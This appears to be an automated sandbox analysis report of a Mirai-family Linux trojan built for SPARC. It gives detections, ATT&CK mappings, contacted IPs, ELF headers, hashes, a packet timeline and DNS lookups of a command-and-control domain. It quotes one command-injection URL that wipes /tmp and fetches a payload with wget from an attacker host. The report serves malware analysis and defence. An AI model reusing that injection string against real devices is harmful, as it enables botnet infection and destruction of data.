        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60136
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60170
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60192
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60214
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60278
        Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60304
        Source: unknownNetwork traffic detected: HTTP traffic on port 47820 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60322
        Source: unknownNetwork traffic detected: HTTP traffic on port 53626 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 60334
        Source: unknownNetwork traffic detected: HTTP traffic on port 33734 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 43134 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33734 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 33734 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35212 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35878 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47692 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 59218 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 35212 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 55786 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 54034 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 42804 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 58352 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 52242 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 46896 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 38630 -> 37215
        Source: unknownNetwork traffic detected: HTTP traffic on port 47820 -> 37215
        Source: /tmp/1XUdzc3d3i (PID: 5221)Queries kernel information via 'uname':
        Source: 1XUdzc3d3i, 5221.1.00000000bc8fb613.00000000deb2bc96.rw-.sdmp, 1XUdzc3d3i, 5228.1.00000000bc8fb613.00000000deb2bc96.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
        Source: 1XUdzc3d3i, 5221.1.00000000bc8fb613.00000000deb2bc96.rw-.sdmp, 1XUdzc3d3i, 5228.1.00000000bc8fb613.00000000deb2bc96.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/sparc
        Source: 1XUdzc3d3i, 5221.1.00000000163a2289.00000000f8689ad3.rw-.sdmp, 1XUdzc3d3i, 5228.1.00000000163a2289.00000000f8689ad3.rw-.sdmpBinary or memory string: 6x86_64/usr/bin/qemu-sparc/tmp/1XUdzc3d3iSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/1XUdzc3d3i
        Source: 1XUdzc3d3i, 5221.1.00000000163a2289.00000000f8689ad3.rw-.sdmp, 1XUdzc3d3i, 5228.1.00000000163a2289.00000000f8689ad3.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 1XUdzc3d3i, type: SAMPLE
        Source: Yara matchFile source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 1XUdzc3d3i, type: SAMPLE
        Source: Yara matchFile source: 5228.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5221.1.0000000089bd9fb8.0000000053dc3079.r-x.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        Service Stop
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
        Non-Standard Port
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer5
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size Limits3
        Ingress Tool Transfer
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 593596 Sample: 1XUdzc3d3i Startdate: 21/03/2022 Architecture: LINUX Score: 100 27 156.156.2.95, 37215 airtel-tz-asTZ Tanzania United Republic of 2->27 29 156.104.246.61, 37215 XNSTGCA United States 2->29 31 99 other IPs or domains 2->31 35 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 3 other signatures 2->41 8 1XUdzc3d3i 2->8         started        10 xfce4-panel wrapper-2.0 2->10         started        12 xfce4-panel wrapper-2.0 2->12         started        14 4 other processes 2->14 signatures3 process4 process5 16 1XUdzc3d3i 8->16         started        process6 18 1XUdzc3d3i 16->18         started        21 1XUdzc3d3i 16->21         started        23 1XUdzc3d3i 16->23         started        25 2 other processes 16->25 signatures7 33 Sample tries to kill multiple processes (SIGKILL) 18->33

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1XUdzc3d3i54%VirustotalBrowse
        1XUdzc3d3i48%ReversingLabsLinux.Trojan.Mirai
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://2.56.59.78:80/shell?cd+/tmp;rm+-rf+*;wget+0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        deathnet.tk
        2.56.59.78
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://2.56.59.78:80/shell?cd+/tmp;rm+-rf+*;wget+true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/1XUdzc3d3ifalse
            high
            http://schemas.xmlsoap.org/soap/envelope/1XUdzc3d3ifalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              173.76.13.179
              unknownUnited States
              701UUNETUSfalse
              197.220.189.48
              unknownGhana
              37341GLOMOBILEGHfalse
              49.51.28.159
              unknownChina
              132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
              92.29.42.255
              unknownUnited Kingdom
              13285OPALTELECOM-ASTalkTalkCommunicationsLimitedGBfalse
              173.36.192.141
              unknownUnited States
              109CISCOSYSTEMSUSfalse
              156.177.182.84
              unknownEgypt
              36992ETISALAT-MISREGfalse
              97.17.253.69
              unknownUnited States
              22394CELLCOUSfalse
              119.143.29.216
              unknownChina
              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              37.6.107.143
              unknownGreece
              25472WIND-ASGRfalse
              146.166.214.232
              unknownUnited States
              14977STATE-OF-WYOMING-ASNUSfalse
              71.225.94.171
              unknownUnited States
              7922COMCAST-7922USfalse
              50.22.160.180
              unknownUnited States
              36351SOFTLAYERUSfalse
              197.32.129.181
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              41.78.38.112
              unknownSouth Africa
              37157IMAGINEZAfalse
              116.115.226.143
              unknownChina
              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              36.84.4.21
              unknownIndonesia
              7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDfalse
              171.59.50.8
              unknownIndia
              9874STARHUB-MOBILEStarHubLtdSGfalse
              136.32.207.18
              unknownUnited States
              16591GOOGLE-FIBERUSfalse
              102.230.179.221
              unknownunknown
              36926CKL1-ASNKEfalse
              197.177.27.54
              unknownKenya
              33771SAFARICOM-LIMITEDKEfalse
              156.76.161.145
              unknownUnited States
              6341WIECUSfalse
              198.64.19.47
              unknownUnited States
              25977HCCSUSfalse
              143.39.188.28
              unknownUnited States
              11003PANDGUSfalse
              156.76.161.138
              unknownUnited States
              6341WIECUSfalse
              197.39.177.27
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              156.161.254.19
              unknownEgypt
              36992ETISALAT-MISREGfalse
              197.43.225.162
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              207.249.183.213
              unknownMexico
              6503AxtelSABdeCVMXfalse
              196.120.43.135
              unknownMorocco
              36925ASMediMAfalse
              182.94.87.92
              unknownIndia
              37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
              85.84.124.111
              unknownSpain
              12338EUSKALTELESfalse
              114.218.156.214
              unknownChina
              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              156.211.246.189
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              197.96.225.121
              unknownSouth Africa
              3741ISZAfalse
              156.92.118.120
              unknownUnited States
              10695WAL-MARTUSfalse
              39.249.90.52
              unknownIndonesia
              23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
              87.236.100.227
              unknownNetherlands
              60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
              156.241.11.73
              unknownSeychelles
              135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
              197.232.116.114
              unknownKenya
              36866JTLKEfalse
              87.193.168.140
              unknownGermany
              20676PLUSNETDEfalse
              93.238.121.35
              unknownGermany
              3320DTAGInternetserviceprovideroperationsDEfalse
              78.139.199.129
              unknownRussian Federation
              34145TOMTELRUfalse
              221.4.80.8
              unknownChina
              17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
              116.64.179.128
              unknownJapan9824JTCL-JP-ASJupiterTelecommunicationCoLtdJPfalse
              197.44.77.162
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              213.224.80.74
              unknownBelgium
              6848TELENET-ASBEfalse
              93.50.183.50
              unknownItaly
              12874FASTWEBITfalse
              197.43.51.137
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              156.141.254.143
              unknownUnited States
              29975VODACOM-ZAfalse
              197.67.29.130
              unknownSouth Africa
              16637MTNNS-ASZAfalse
              176.28.64.70
              unknownRussian Federation
              47684FCOMM-ASRUfalse
              155.62.24.145
              unknownSingapore
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              191.66.127.173
              unknownColombia
              26611COMCELSACOfalse
              223.48.61.129
              unknownKorea Republic of
              9644SKTELECOM-NET-ASSKTelecomKRfalse
              41.25.211.120
              unknownSouth Africa
              36994Vodacom-VBZAfalse
              213.28.41.152
              unknownFinland
              1759TSF-IP-CORETeliaFinlandOyjEUfalse
              197.32.129.156
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              156.91.128.235
              unknownUnited States
              10695WAL-MARTUSfalse
              71.44.189.206
              unknownUnited States
              33363BHN-33363USfalse
              161.206.180.107
              unknownUnited States
              3839ERX-CHULANETChulalongkornUniversityTHfalse
              156.230.19.121
              unknownSeychelles
              135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
              62.222.197.160
              unknownIreland
              8918CARRIER1-ASIEfalse
              217.130.116.181
              unknownSpain
              12430VODAFONE_ESESfalse
              156.55.39.69
              unknownUnited States
              22146LANDAMUSfalse
              41.91.211.136
              unknownEgypt
              37069MOBINILEGfalse
              41.240.169.36
              unknownSudan
              36998SDN-MOBITELSDfalse
              150.145.12.53
              unknownItaly
              137ASGARRConsortiumGARREUfalse
              76.136.124.29
              unknownUnited States
              7922COMCAST-7922USfalse
              159.7.108.117
              unknownSweden
              1906NORTHROP-GRUMMANUSfalse
              96.38.60.26
              unknownUnited States
              20115CHARTER-20115USfalse
              113.180.240.203
              unknownViet Nam
              45899VNPT-AS-VNVNPTCorpVNfalse
              156.249.107.61
              unknownSeychelles
              139086ONL-HKOCEANNETWORKLIMITEDHKfalse
              140.195.197.137
              unknownUnited States
              4010DNIC-AS-04010USfalse
              173.225.253.140
              unknownJamaica
              33576DIG001JMfalse
              121.28.250.100
              unknownChina
              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              143.79.217.106
              unknownUnited States
              1463DNIC-ASBLK-01462-01463USfalse
              41.51.170.61
              unknownSouth Africa
              37168CELL-CZAfalse
              41.240.109.246
              unknownSudan
              36998SDN-MOBITELSDfalse
              156.110.146.110
              unknownUnited States
              16922OUHSC-EDUUSfalse
              88.113.64.102
              unknownFinland
              719ELISA-ASHelsinkiFinlandEUfalse
              136.206.67.50
              unknownIreland
              1213HEANETIEfalse
              156.156.2.95
              unknownTanzania United Republic of
              37133airtel-tz-asTZfalse
              60.132.89.70
              unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              35.43.34.16
              unknownUnited States
              36375UMICH-AS-5USfalse
              83.245.107.32
              unknownUnited Kingdom
              3356LEVEL3USfalse
              41.115.200.35
              unknownSouth Africa
              16637MTNNS-ASZAfalse
              167.35.249.255
              unknownCanada
              2665CDAGOVNCAfalse
              149.114.248.109
              unknownUnited States
              188SAIC-ASUSfalse
              197.91.228.112
              unknownSouth Africa
              10474OPTINETZAfalse
              156.104.246.61
              unknownUnited States
              393504XNSTGCAfalse
              72.70.170.202
              unknownUnited States
              701UUNETUSfalse
              156.237.86.226
              unknownSeychelles
              134705ITACE-AS-APItaceInternationalLimitedHKfalse
              194.181.249.111
              unknownPoland
              8308NASK-COMMERCIALPLfalse
              156.0.172.175
              unknownSouth Africa
              328112Linux-Based-Systems-Design-ASZAfalse
              197.114.121.115
              unknownAlgeria
              36947ALGTEL-ASDZfalse
              9.7.36.10
              unknownUnited States
              3356LEVEL3USfalse
              41.239.218.69
              unknownEgypt
              8452TE-ASTE-ASEGfalse
              91.121.230.194
              unknownFrance
              16276OVHFRfalse
              205.67.73.23
              unknownUnited States
              3475DNIC-AS-03475USfalse
              197.90.74.11
              unknownSouth Africa
              10474OPTINETZAfalse
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.359558358993201
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:1XUdzc3d3i
              File size:104904
              MD5:0d6ec05db10f19ae04e6a9d78feacbe7
              SHA1:b1150a9a3aa559984a0f02cd1dbd323942b2c750
              SHA256:591cf7deefbe54bdeedcddb1825fab90dcced062f419db0663f167b2c61b7b64
              SHA512:7dabca528479aa028794efc696c82bdfdc4c34a7aa198040106cbe51b2c4f49febb6facd1ade3507885519b1281f4c53d7bdea5b5338f8c3e6714ba85239eb4c
              SSDEEP:1536:3yzX/XFiLdniKYpKhYiujKUHZum0j+hjHENnp9Q+TXwwfIEFD:2XSdHY1TuFcmzQSdfd
              File Content Preview:.ELF...........................4...8.....4. ...(.......................................................4............dt.Q................................@..(....@.].................#.....c...`.....!.....!...@.....".........`......$!...!...@...........`....

              ELF header

              Class:ELF32
              Data:2's complement, big endian
              Version:1 (current)
              Machine:Sparc
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x101a4
              Flags:0x0
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:104504
              Section Header Size:40
              Number of Section Headers:10
              Header String Table Index:9
              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x100940x940x1c0x00x6AX004
              .textPROGBITS0x100b00xb00x177c80x00x6AX004
              .finiPROGBITS0x278780x178780x140x00x6AX004
              .rodataPROGBITS0x278900x178900x1d300x00x2A008
              .ctorsPROGBITS0x395c40x195c40x80x00x3WA004
              .dtorsPROGBITS0x395cc0x195cc0x80x00x3WA004
              .dataPROGBITS0x395d80x195d80x2200x00x3WA008
              .bssNOBITS0x397f80x197f80x4980x00x3WA008
              .shstrtabSTRTAB0x00x197f80x3e0x00x0001
              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x100000x100000x195c00x195c03.87130x5R E0x10000.init .text .fini .rodata
              LOAD0x195c40x395c40x395c40x2340x6cc1.59740x6RW 0x10000.ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
              TimestampSource PortDest PortSource IPDest IP
              Mar 21, 2022 20:07:32.677706957 CET4251680192.168.2.23109.202.202.202
              Mar 21, 2022 20:07:37.042006969 CET1415623192.168.2.23112.187.63.32
              Mar 21, 2022 20:07:37.042022943 CET1415623192.168.2.23128.3.253.94
              Mar 21, 2022 20:07:37.042036057 CET1415623192.168.2.2348.54.54.33
              Mar 21, 2022 20:07:37.042048931 CET1415623192.168.2.2335.109.27.19
              Mar 21, 2022 20:07:37.042069912 CET1415623192.168.2.23194.149.98.193
              Mar 21, 2022 20:07:37.042084932 CET1415623192.168.2.2314.54.227.158
              Mar 21, 2022 20:07:37.042088032 CET1415623192.168.2.23182.237.227.245
              Mar 21, 2022 20:07:37.042103052 CET1415623192.168.2.23164.38.119.191
              Mar 21, 2022 20:07:37.042114019 CET1415623192.168.2.23208.198.27.160
              Mar 21, 2022 20:07:37.042115927 CET1415623192.168.2.2365.43.7.75
              Mar 21, 2022 20:07:37.042120934 CET1415623192.168.2.2390.118.122.135
              Mar 21, 2022 20:07:37.042140961 CET1415623192.168.2.23179.185.195.111
              Mar 21, 2022 20:07:37.042150021 CET1415623192.168.2.23107.35.7.79
              Mar 21, 2022 20:07:37.042222977 CET1415623192.168.2.23209.13.60.66
              Mar 21, 2022 20:07:37.042223930 CET1415623192.168.2.23147.96.199.94
              Mar 21, 2022 20:07:37.042308092 CET1415623192.168.2.23216.180.44.194
              Mar 21, 2022 20:07:37.042310953 CET1415623192.168.2.235.115.111.231
              Mar 21, 2022 20:07:37.042327881 CET1415623192.168.2.2320.72.225.179
              Mar 21, 2022 20:07:37.042339087 CET1415623192.168.2.23120.116.214.230
              Mar 21, 2022 20:07:37.042344093 CET1415623192.168.2.2359.240.189.92
              Mar 21, 2022 20:07:37.042362928 CET1415623192.168.2.23171.8.72.86
              Mar 21, 2022 20:07:37.042395115 CET1415623192.168.2.23168.219.177.216
              Mar 21, 2022 20:07:37.042398930 CET1415623192.168.2.239.131.187.37
              Mar 21, 2022 20:07:37.042417049 CET1415623192.168.2.2313.139.91.233
              Mar 21, 2022 20:07:37.042422056 CET1415623192.168.2.23133.72.34.1
              Mar 21, 2022 20:07:37.042467117 CET1415623192.168.2.231.73.210.229
              Mar 21, 2022 20:07:37.042471886 CET1415623192.168.2.2375.78.210.117
              Mar 21, 2022 20:07:37.042489052 CET1415623192.168.2.23131.210.12.40
              Mar 21, 2022 20:07:37.042491913 CET1415623192.168.2.23168.115.42.3
              Mar 21, 2022 20:07:37.042509079 CET1415623192.168.2.2360.248.199.242
              Mar 21, 2022 20:07:37.042511940 CET1415623192.168.2.2368.170.182.235
              Mar 21, 2022 20:07:37.042690039 CET1415623192.168.2.2320.44.166.123
              Mar 21, 2022 20:07:37.042689085 CET1415623192.168.2.23203.183.187.135
              Mar 21, 2022 20:07:37.042701960 CET1415623192.168.2.23206.2.67.238
              Mar 21, 2022 20:07:37.042712927 CET1415623192.168.2.2392.241.39.99
              Mar 21, 2022 20:07:37.042721987 CET1415623192.168.2.2372.133.56.198
              Mar 21, 2022 20:07:37.042733908 CET1415623192.168.2.2371.93.225.238
              Mar 21, 2022 20:07:37.042742968 CET1415623192.168.2.2327.183.160.1
              Mar 21, 2022 20:07:37.042773962 CET1415623192.168.2.23135.114.251.84
              Mar 21, 2022 20:07:37.042788029 CET1415623192.168.2.23117.194.208.208
              Mar 21, 2022 20:07:37.042799950 CET1415623192.168.2.2386.129.206.203
              Mar 21, 2022 20:07:37.042831898 CET1415623192.168.2.2379.236.30.104
              Mar 21, 2022 20:07:37.042835951 CET1415623192.168.2.23191.66.182.135
              Mar 21, 2022 20:07:37.042860985 CET1415623192.168.2.2317.241.101.198
              Mar 21, 2022 20:07:37.042862892 CET1415623192.168.2.23148.127.200.12
              Mar 21, 2022 20:07:37.042864084 CET1415623192.168.2.23118.198.45.70
              Mar 21, 2022 20:07:37.042875051 CET1415623192.168.2.2373.147.89.196
              Mar 21, 2022 20:07:37.042887926 CET1415623192.168.2.2382.98.174.84
              Mar 21, 2022 20:07:37.042901039 CET1415623192.168.2.2313.40.91.202
              Mar 21, 2022 20:07:37.043037891 CET1415623192.168.2.23169.111.183.61
              Mar 21, 2022 20:07:37.045120001 CET1415623192.168.2.23174.107.245.211
              Mar 21, 2022 20:07:37.045135975 CET1415623192.168.2.23201.194.140.182
              Mar 21, 2022 20:07:37.045135021 CET1415623192.168.2.2324.16.75.130
              Mar 21, 2022 20:07:37.045142889 CET1415623192.168.2.23181.130.128.228
              Mar 21, 2022 20:07:37.045149088 CET1415623192.168.2.23130.99.138.134
              Mar 21, 2022 20:07:37.045149088 CET1415623192.168.2.231.99.62.127
              Mar 21, 2022 20:07:37.045157909 CET1415623192.168.2.23195.156.159.8
              Mar 21, 2022 20:07:37.045166969 CET1415623192.168.2.23203.104.109.6
              Mar 21, 2022 20:07:37.045178890 CET1415623192.168.2.23160.182.90.149
              Mar 21, 2022 20:07:37.045188904 CET1415623192.168.2.2361.159.91.120
              Mar 21, 2022 20:07:37.045192957 CET1415623192.168.2.23158.73.116.45
              Mar 21, 2022 20:07:37.045195103 CET1415623192.168.2.2336.39.207.75
              Mar 21, 2022 20:07:37.045197010 CET1415623192.168.2.231.163.76.75
              Mar 21, 2022 20:07:37.045200109 CET1415623192.168.2.23156.48.138.19
              Mar 21, 2022 20:07:37.045206070 CET1415623192.168.2.23105.173.98.95
              Mar 21, 2022 20:07:37.045217991 CET1415623192.168.2.23218.100.107.23
              Mar 21, 2022 20:07:37.045224905 CET1415623192.168.2.2389.5.55.80
              Mar 21, 2022 20:07:37.045228004 CET1415623192.168.2.2364.187.38.99
              Mar 21, 2022 20:07:37.045245886 CET1415623192.168.2.2396.71.236.241
              Mar 21, 2022 20:07:37.045255899 CET1415623192.168.2.2397.145.117.250
              Mar 21, 2022 20:07:37.045258045 CET1415623192.168.2.23145.4.87.213
              Mar 21, 2022 20:07:37.045264959 CET1415623192.168.2.23146.189.212.123
              Mar 21, 2022 20:07:37.045268059 CET1415623192.168.2.2312.25.65.141
              Mar 21, 2022 20:07:37.045280933 CET1415623192.168.2.23191.101.187.49
              Mar 21, 2022 20:07:37.045342922 CET1415623192.168.2.23111.60.200.26
              Mar 21, 2022 20:07:37.045352936 CET1415623192.168.2.2382.97.101.226
              Mar 21, 2022 20:07:37.045366049 CET1415623192.168.2.2312.30.139.179
              Mar 21, 2022 20:07:37.045372963 CET1415623192.168.2.2320.167.184.107
              Mar 21, 2022 20:07:37.045387030 CET1415623192.168.2.2394.213.115.136
              Mar 21, 2022 20:07:37.045392990 CET1415623192.168.2.2336.173.208.48
              Mar 21, 2022 20:07:37.045612097 CET1415623192.168.2.231.64.61.52
              Mar 21, 2022 20:07:37.045619965 CET1415623192.168.2.2393.25.6.171
              Mar 21, 2022 20:07:37.045620918 CET1415623192.168.2.23108.251.218.54
              Mar 21, 2022 20:07:37.045630932 CET1415623192.168.2.23176.109.39.167
              Mar 21, 2022 20:07:37.045696974 CET1415623192.168.2.23118.208.67.98
              Mar 21, 2022 20:07:37.045716047 CET1415623192.168.2.23176.107.231.64
              Mar 21, 2022 20:07:37.045731068 CET1415623192.168.2.23156.94.182.165
              Mar 21, 2022 20:07:37.045737028 CET1415623192.168.2.23120.0.175.140
              Mar 21, 2022 20:07:37.045747042 CET1415623192.168.2.2398.36.158.100
              Mar 21, 2022 20:07:37.045768023 CET1415623192.168.2.23153.119.83.21
              Mar 21, 2022 20:07:37.045768023 CET1415623192.168.2.23123.171.50.48
              Mar 21, 2022 20:07:37.045783043 CET1415623192.168.2.2317.139.184.0
              Mar 21, 2022 20:07:37.045800924 CET1415623192.168.2.2338.197.207.84
              Mar 21, 2022 20:07:37.045816898 CET1415623192.168.2.2323.138.27.165
              Mar 21, 2022 20:07:37.045819998 CET1415623192.168.2.23126.248.43.88
              Mar 21, 2022 20:07:37.045835018 CET1415623192.168.2.23160.20.107.117
              Mar 21, 2022 20:07:37.045854092 CET1415623192.168.2.2359.57.34.126
              Mar 21, 2022 20:07:37.045859098 CET1415623192.168.2.2374.180.243.20
              Mar 21, 2022 20:07:37.045866966 CET1415623192.168.2.23142.134.61.27
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Mar 21, 2022 20:07:37.112967968 CET192.168.2.238.8.8.80x514Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.160609961 CET192.168.2.238.8.8.80xc44fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.206248045 CET192.168.2.238.8.8.80x1a6cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.252336025 CET192.168.2.238.8.8.80x8577Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.297350883 CET192.168.2.238.8.8.80xe746Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.340367079 CET192.168.2.238.8.8.80xd88bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.383907080 CET192.168.2.238.8.8.80xab4eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.429353952 CET192.168.2.238.8.8.80x1c3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.473567963 CET192.168.2.238.8.8.80xf93aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.529769897 CET192.168.2.238.8.8.80x438dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.577184916 CET192.168.2.238.8.8.80xd7b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.629148960 CET192.168.2.238.8.8.80x934aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.674571991 CET192.168.2.238.8.8.80xad88Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.723841906 CET192.168.2.238.8.8.80x905aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.769094944 CET192.168.2.238.8.8.80x43b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.818238974 CET192.168.2.238.8.8.80x396dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.864943981 CET192.168.2.238.8.8.80xb255Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.913114071 CET192.168.2.238.8.8.80x751bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:37.964169979 CET192.168.2.238.8.8.80x3916Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.012970924 CET192.168.2.238.8.8.80xb6f0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.058845043 CET192.168.2.238.8.8.80xe1eaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.108388901 CET192.168.2.238.8.8.80x9033Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.153551102 CET192.168.2.238.8.8.80x4ccfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:07:38.199254036 CET192.168.2.238.8.8.80xb1c5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
